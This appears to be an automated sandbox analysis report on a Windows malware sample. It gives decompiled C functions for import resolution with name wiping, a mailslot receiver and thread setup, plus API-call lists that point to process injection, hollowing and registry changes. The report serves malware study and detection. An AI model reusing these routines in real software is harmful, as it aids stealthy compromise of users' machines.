						}
						_v8 = _t35 - _t46 + _t42; // offset from the name-thunk array to the matching IAT slot
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							// high bit set: the thunk already holds an absolute address; discard it unless it lies inside the image (SizeOfImage at +0x50)
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42; // RVA of IMAGE_IMPORT_BY_NAME
						}
						_t11 = _t28 + 2; // 0x2: skip the 2-byte Hint to reach the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); // wipe the function name after resolution
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // write the resolved address into the IAT
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // ERROR_PROC_NOT_FOUND
						goto L19;
					}
					_t27 = _t35; // no OriginalFirstThunk: walk FirstThunk directly
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // ERROR_MOD_NOT_FOUND
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41); // one-byte instruction at 0x401033; CreateThread enters at 0x401034 and skips it
				_t39 = 0; // bytes received so far
				_v8 = 0x1000;
				// mailslot server side: messages of up to 0x1000 bytes, no read timeout
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v20 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000); // RtlAllocateHeap (see APIs below)
					if(_t36 == 0) {
						L10:
						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					} else {
						// receive one message per iteration; the loop ends on the first message shorter than 0x1000 bytes
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) { // ERROR_SEM_TIMEOUT: keep waiting
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								// grow the receive buffer by one message size on the heap created at entry
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4; // hand the buffer and its length back to the caller's context
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed; base address of the running image
				_t2 = HeapCreate(0, 0x10000, 0); // executed; private 64 KiB heap used by the worker threads
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed; main routine, returns 0 or a Win32 error code
				}
				ExitThread(_t3); // the process exits with the error code as its status
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
